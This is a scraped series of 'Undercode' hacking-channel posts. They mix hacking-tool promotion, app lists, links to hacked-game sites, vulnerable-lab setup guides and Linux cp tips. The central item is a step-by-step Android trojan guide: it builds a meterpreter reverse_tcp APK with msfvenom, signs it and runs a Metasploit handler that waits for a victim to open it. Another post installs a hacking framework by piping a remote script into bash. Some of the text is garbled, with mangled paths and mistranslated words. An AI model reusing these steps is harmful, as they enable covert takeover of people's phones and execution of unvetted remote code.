▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shell checker & full hacking tool -A Penetration Testing Framework


1) Information Gathering:

2) Password Attacks:

3)Wireless Testing:

4)Exploitation Tools

5) Sniffing & Spoofing:

6) Web Hacking:

Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework

7) Private Web Hacking:

8)Post Exploitation:

ⒾⓃⓈⓉⒶⓁⓁⒾⓈⒶⓉⒾⓄⓃ & ⓇⓊⓃ :

A) termux and linux type :

( https://github.com/Manisso/fsociety)
>bash <(wget -qO- https://git.io/vAtmB)
B)Docker-compose

docker-compose build
docker-compose up -d
docker-compose exec fsociety fsociety
docker-compose down # destroys instance

c) for windows :

Download Linux Bash Like Cygwin

Download Python

Use Google Cloud Console Cloud Shell

Or Use Free Ubuntu VPS c9.io

✅

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Google says foreign hackers attacked emails of campaigners such as Trump and Biden :
> News

> Reuters reported that foreign hackers are attacking the emails of US presidential candidates, and the personal email accounts of current President Donald Trump and Democratic Party candidate Joe Biden are under threat. Analysts say that some hackers with senior backgrounds tried to target the staff of Biden's campaign team, while other so-called Iranian hackers aimed their eyes at the email accounts of Trump's campaign team staff.

>Google's threat analysis team leader Shane Huntley said in a tweet that the hacker had launched a phishing attempt on the US presidential candidate and showed no signs of ending it.

>A Google spokesperson also said in an interview with TheVerge that the company has not yet seen evidence that any attack has succeeded, so it has not passed relevant information to federal law enforcement officials.

> Even so, Google still encourages members of the campaign team to provide additional protection for their work and personal email accounts, such as two-step verification and the advanced security protection provided by Google.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 WiFi Hacking working Apps for Android :

https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer

https://play.google.com/store/apps/details?id=com.overlook.android.fing

https://play.google.com/store/apps/details?id=com.ngb.wpsconnect

https://forum.xda-developers.com/showthread.php?t=2398114

https://play.google.com/store/apps/details?id=com.arcai.netcut

https://github.com/w-shackleton/android-netspoof/

https://play.google.com/store/apps/details?id=lksystems.wifiintruder

https://forum.xda-developers.com/showthread.php?t=2236465

https://forum.xda-developers.com/showthread.php?t=1914699

https://play.google.com/store/apps/details?id=com.tester.wpswpatester

https://forum.xda-developers.com/showthread.php?t=2338179

https://www.kali.org/kali-linux-nethunter/

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANDROID HACKING APPS 2020 :



1) DroidBox

https://downloadapks.net/app/droidbox-apk/

2) Kali Net Hunter

https://www.kali.org/kali-linux-nethunter/

3) Zanti

https://zanti.en.softonic.com/android

4) CSploit

http://www.csploit.org/downloads/

5) Hackod

https://apkpure.com/hackode/com.techfond.hackode

6) Network mapper

https://www.malavida.com/en/soft/network-mapper/android/#gref

7)androrat

https://www.apkfirm.com/androrat/

8) DroidSheep - Wi-Fi Kill -

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑From 8 days last update Information Gathering Instagram.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) $ pkg install -y git

2) $ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig

3) $ chmod +x install.sh && ./install.sh

• Usage
4) $ python3 main.py -u username

5) $ python3 main.py -h

6) main.py [-h] -u USERNAME [-p] [-s]

optional arguments:

-h, --help show this help message and exit

-u USERNAME, --username USERNAME username of account to scan

-p, --postscrap scrape all uploaded images info

-s, --savedata save data to file ( save profile pic, info , post info )

✅

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2019-2020 lastest list

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TRUSTED & POIPULAR DOWNLOAD HACKED GAMES SITES :


http://www.qiqigames.com/hacked-games

http://scratch.mit.edu/studios/484561/

http://www.playhacked.com/

http://www.prehackshub.com/

http://www.enemy.com/

http://www.hackedgames.net/

http://www.gameswithcheats.com/

http://www.hackedarcadegames.com/

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
http://www.arcadeprehacks.com/

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Android Hacking Steps by undercode :
1. Create Payload

To create a trojan for hacking Android, we need to create a payload using the msfvenom utility in Kali Linux.

root @ destroyer: ~ # msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.0.50 LPORT = 4444 R> /root/MyPath/my0704.apk
No platform was selected, choosing Msf :: Module :: Platform :: Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes


In the LHOST command above, IP is set, used in the ifconfig command from Kali Linux.

The above command creates a Trojan apk file that will be installed on the target phone for use, however before that we must sign this apk for proper installation. Follow the steps below the list for this.

and. Creating a keystore:

root @ destroyer: ~ # keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000


The above team asks questions and password.

b. Sign the created file using jarsigner apk.

root @ destroyer: ~ # jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF / APP.SF
adding: META-INF / APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.


with. Check apk created with jarsigner.

root @ destroyer: ~ # jarsigner -verify -verbose -certs /root/MyPath/my0704.apk


e. File optimization with zipalign apk.

Before you begin, install zipalign using the command below:

apt-get install zipalign


Now let me optimize apk.

root @ destroyer: ~ # zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk
Verifying alignment of /root/MyPath/my0704_sign.apk (4) ...
50 META-INF / MANIFEST.MF (OK - compressed)
281 META-INF / APP.SF (OK - compressed)
623 META-INF / APP.RSA (OK - compressed)
1752 META-INF / (OK)
1802 META-INF / SIGNFILE.SF (OK - compressed)
2087 META-INF / SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful


Thus, our final apk, which we use to crack the android, is named as “my0704_sign.apk”.

2. Run msfconsole on Kali Linux to operate the Android phone.

root @ destroyer: ~ # msfconsole

Call trans opt: received. 01-01-17 20:00:10 REC: Loc

Trace program: running

wake up, Neo ...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`., -,
``. ,; ' /
`. , '/.'
`. X /. '
.-; --'' - .._ `` (
. ' / `
, `` Q '
,, `._ \
,. | '' -.; _ '
:. `; `` -, .._;
'',). '
`._, '/ _
; , '' - ,; ' `` -
`` -..__ `` --`

http://metasploit.com


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro - learn more on http://rapid7.com/metasploit

= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]

msf>


In the msf line above, launch the payload on android and exploit command multiboot using below:

msf> use exploit / multi / handler
msf exploit (handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf exploit (handler)>


In the command below we use Kali Linux IP, can be taken using the ifconfig command on Kali Linux. In addition, we use port number 4444 for operation.

msf exploit (handler)> set LHOST 192.168.0.50
LHOST => 192.168.0.50
msf exploit (handler)> set LPORT 4444
LPORT => 4444
msf exploit (handler)>


And then finally use a command that will wait for apk to execute on the Android phone.

msf exploit (handler)> exploit

[*] Started reverse TCP handler on 192.168.0.50-00-00444
[*] Starting the payload handler ...


Running apk on android.
Here we use the Android emulator provided by Google. Therefore, you need to download the ISO image from the site Google.

After booting, you can create a normal VMware virtual machine and mount this ISO on the virtual machine to start the virtual machine. Configure Android VM using id gmail.


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Hacking via kali linux Steps full by undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Damn Vulnerable Web App :


1) Usually, web application creators in every possible way boast of the high reliability of their product, boast of built-in WAF (firewall for web applications) and bashfully laugh it off if they find another bug in their scripts. The developers of Damn Vulnerable Web App, on the contrary, categorically declare that the installation on a
live web server is unacceptable, because the application ... is "damn vulnerable" :).

2) All the most common mistakes of unfortunate programmers are collected in one place, so that you can train to conduct a variety of attacks.

3) The most popular PHP / MySQL bundle was chosen as a platform, for the same reason we start our review with DVWA. If you want to save time on setting up a web server, everything will work fine on ready-made assemblies:

🦑HOW TO DO ?

> Denwer 'e or
Download : http://www.denwer.ru/

>XAMPP ' e.
http://www.apachefriends.org/xampp-en.html


2) Actually, you just need to unzip the files into the public html directory and access the browser in http://127.0.0.1/dvwa/index.php. You don’t even have to tinker with manual database creation: the menu has a Create / Reset Database button.

3) But if you still want to tighten something up, then this can be done in the /config/config.inc.php config.

4) Another point is about setting up PHP: you need to make sure that
all changes are made to PHP.ini .

magic_quotes_gpc = Off
allow_url_fopen on
allow_url_include on


WRITTEN BY uNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Webgoat
(Damn Vulnerable Web App)

1) When the author of Mutillidae said that many of the hacking quests are not suitable for beginners, he meant, including the development of WebGoat.

2) The project is notable for the fact that it is developing as part of the already familiar OWASP (Open Web Application Security Project) project, under the auspices of which a large number of security utilities are being released. But if the two previous projects offer to play with
PHP-applications, then here you will come across code written in Java. A
standard TomCat server is used for hosting J2EE applications
/ fortunately, it is

3) already included in the WebGoat assembly and configured so that it can be started
as simply as possible:

🦑HOW TO DO ?

1) First, unpack WebGoat-OWASP_Standard-xxzip into the working
directory.

2) We start the TomCat daemon by running webgoat.bat. For this,
a fresh J2EE must be installed in the system .

3) We go in the browser at the link http: // localhost / WebGoat / attack.
Log in as guest / guest.

4) We try our strength.

> Assignments are usually tied to a real problem. For example, in one of the quests, an SQL injection is proposed to steal a list of fake
credit numbers. Some tasks are accompanied by a training component,
showing the user useful hints and vulnerable code.

WRITTEN BY undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS Moth AND WHY IS SO USEFULL ?


1) Moth is configured to receive all network settings from a DHCP server,
so you need to make sure that the network settings in the virtual machine settings are set accordingly (for example, I get an IP router, so I just chose Bridged mode, which releases the virtual machine into the physical network )

2) Next, just start the virtual machine, log in to the system (moth / moth), go to bed

> ifconfig'om received by the IP system and access the Moth admin panel via the browser:

> http: // <moth-ip_address>. You will be taken to the main page, where you can go

3) to the scripts of famous products pre-installed on the server: the
Wordpress 2.6.5 blogging engine , the Vanilla 1.1.4 forum and other PHP / MySQL-based developments, and
also one Java + Tomcat6 + MySQL project.

4) To enhance the reality of what is happening, three methods have been implemented for accessing
scripts: directly, through mod_security, and through PHP-IDS:

> http: //moth/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>

> http: //moth/mod_security/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>

> http: //moth/php-ids/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>
Mod_security and PHP-IDS are WAF (Web Application Firewall) and
offer additional protection for web applications (more in our article " Firewall

5) for web applications " in the October issue of "Hacker"). Each of them keeps a detailed log of suspicious requests, so this is also a great way to figure out how these

6) WAFs work and how to trick them. The project itself is being updated, and the authors promise in the near future to add vulnerable applications written in Python and Ruby.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to copy a file from one directory to another using Linux
-BEGINER TIPS :

How to copy a file from one directory to another using Linux

1) cp / source / path / name / target / path / name


2) For example, imagine that you have the following folder structure:

home
andreyex
documents
folder_one
file_one
file_two
file_three
folder_two
file4

3) If you want to copy file_one from the current location to / home / andreyex / documents / folder_one to / home / andreyex / documents / folder_two, then you must enter the following command at the command line:

4) cp / home / andreyex / documents / folder_one / file_one / home / andreyex / documents / folder_two / file_one


🦑 You can make shortcuts here :

1) The main part can be replaced with a tilde (~), which is explained in this article. This changes the command to:

2) cp ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one

3) You can simply omit the file name for the purpose if you intend to use the same file name

cp ~ / documents / folder_one / file_one ~ / documents / folder_two


4) If you are already in the target folder, you can simply replace the path to the target with a full stop.

cp ~ / documents / folder_one / file_one


5) lternatively, if you are already in the source folder, you can simply specify the file name as the source as follows:

cp file_one ~ / documents / folder_two

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to backup before copying files on Linux ?

1) In the previous section, folder_one contains a file named file_one and folder_two does not. Imagine that folder_two has a file called file_one and you run the following command:

2) cp file_one ~ / documents / folder_two


🦑The above command will overwrite file_one, which is currently located in folder_two. There are no hints, no warnings and error messages, because, you specified a valid command.

1) You can take precautions when copying files on Linux to back up a file before it overwrites it. Just use the following command:

2) cp -b / source / file / target / file


🦑For instance:

1) cp -b ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


2) The destination folder now contains the file that was copied and there will also be a file with a tilde (~) at the end, which is a backup of the original file.

3) You can change the backup command to work in a slightly different way, so that it creates numbered backups. You can do this if you have already backed up files and backups already exist. This is a form of version control.

4) cp --backup = numbered ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


5) The file name for the backups will change: file_one. ~ 1 ~, file_one. ~ 2 ~, etc.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to request before overwriting files when copying to Linux
If you do not want to make backup copies of the files lying on your file system, but you also want to make sure that the copy command does not overwrite the file indiscriminately, you may receive a prompt to indicate if you want to overwrite. - Kali -parrot-debian-..

🦑 To do this, use the following syntax:

1) cp -i / source / file / target / file


For instance:

2) cp -i ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


3) The message will look like this: cp: overwrite './file1'?

To overwrite the file, press Y on the keyboard or to cancel, press N or CTRL and C at the same time.



🦑 What happens when copying symbolic links on Linux
A symlink is a bit like a desktop shortcut. The contents of the symbolic link is the address of the physical file.

Imagine you have the following folder structure:

home
andreyex
documents
folder_one
file_one
folder_two
file_one (symbolic links points to folder_one / file_one)
folder3
Look at the following command:

cp ~ / documents / folder_one / file_one ~ / documents / folder3 / file_one


4) This should not be anything new, since it copies a physical file from one folder to another.

🦑What happens, however, if you copy a symbolic link from folder_two to folder3?

1) cp ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


2) A file that is copied to folder3 will not be a symbolic link. This is actually a file pointed to by a symbolic link, so in fact you will get the same result as if by copying file_one from folder_one.

By the way, you can get the same result with the following command:

3) cp -H ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


4) Just to be sure, although there is one more switch that absolutely makes the file copy, not a symbolic link:

cp -L ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


5) If you want to copy a symbolic link, you must specify the following command:

cp -d ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


6) To copy a symbolic link, not a physical file, using the following command:

cp -P ~ / documents / folder_two / file_one ~ documents / folder3 / file_one


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁